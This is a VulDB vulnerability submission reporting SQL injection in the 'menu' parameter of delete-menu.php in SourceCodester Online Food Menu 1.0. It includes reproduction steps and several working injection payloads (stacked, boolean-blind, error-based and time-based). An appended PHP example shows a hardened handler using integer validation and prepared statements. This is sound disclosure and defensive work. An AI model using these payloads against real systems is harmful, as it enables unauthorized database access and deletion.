| Title | SourceCodester Online Food Menu 1.0 SQL Injection |
|---|---|
| Description | Dear Vuldb
I hope this message finds you well. I would like to report a SQL injection vulnerability I discovered in the sourcecodester of the Online Food Menu Using PHP and MySQL with Source Code during my testing.
Details:
Affected URL/Endpoint: /food-menu/endpoint/delete-menu.php
Vulnerable Parameter: menu
Risk Level: High (allows malicious users to execute arbitrary SQL queries)
Steps to reproduce:
1) Navigate to the Admin area page.
2) Use a proxy like Burp Suite to intercept the "delete-menu" request.
3) Input the payload "/food-menu/endpoint/delete-menu.php?menu=4';SELECT+SLEEP(7)%23" to invoke the SQL injection.
4) The menu is also vulnerable to the following attacks after running sqlmap on it.
Parameter: menu (GET)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: menu=4' AND EXTRACTVALUE(8269,CASE WHEN (8269=8269) THEN 8269 ELSE 0x3A END)-- jhtJ
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: menu=4' AND GTID_SUBSET(CONCAT(0x71627a6a71,(SELECT (ELT(1777=1777,1))),0x716b6a7071),1777)-- uuXb
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: menu=4';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: menu=4' AND (SELECT 7516 FROM (SELECT(SLEEP(5)))ythw)-- AVNZ
Please let me know if you need further information or a more detailed analysis.
Best regards,
[Your Name] |
| User | Delvy (UID 74555) |
| Submitted | 09/06/2024 04:30 AM (1 year ago) |
| Moderation | 09/06/2024 11:30 PM (19 hours later) |
| Status | Accepted |
| VulDB Entry | 276779 [SourceCodester Online Food Menu 1.0 delete-menu.php menu SQL Injection] |
| Points | 17 |
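As an added example (not the project's code and not part of the submission), the following shows how a delete handler for the reported `/food-menu/endpoint/delete-menu.php?menu=<id>` endpoint can be hardened so that the quoted, commented and stacked payloads above are rejected. The mysqli connection, the credential placeholders and the `menu` table with an integer `id` column are assumptions.

```php
<?php
// Added example: hardened handler for delete-menu.php (assumed schema, not the project's code).
declare(strict_types=1);

// Vulnerable pattern consistent with the report (hypothetical reconstruction):
//   $conn->query("DELETE FROM menu WHERE id = '" . $_GET['menu'] . "'");
// Concatenating the raw parameter lets a value such as 4';SELECT SLEEP(7)#
// close the quoted literal and append statements or conditions.

function delete_menu_item(mysqli $conn, array $get): array
{
    // 1. Type-validate before the value is used at all. The id is a positive
    //    integer, so any string carrying quotes, comments or SQL is rejected here.
    $id = filter_var(
        $get['menu'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {
        return ['status' => 400, 'message' => 'invalid menu id'];
    }

    // 2. Bind the id as data with a prepared statement. The SQL text is fixed,
    //    so the parameter can never change the query's structure.
    $stmt = $conn->prepare('DELETE FROM menu WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $deleted = $stmt->affected_rows;
    $stmt->close();

    return $deleted > 0
        ? ['status' => 200, 'message' => 'deleted']
        : ['status' => 404, 'message' => 'not found'];
}

// Usage: reached only after the application's own admin authentication check
// (not shown). Credentials below are placeholders.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$conn = new mysqli('localhost', 'DB_USER_PLACEHOLDER', 'DB_PASS_PLACEHOLDER', 'DB_NAME_PLACEHOLDER');

$result = delete_menu_item($conn, $_GET);
http_response_code($result['status']);
header('Content-Type: application/json');
echo json_encode($result);
```

With this handler, every payload listed in the report fails the integer check and returns 400 before any query runs; the prepared statement is the defence that remains if validation is ever loosened.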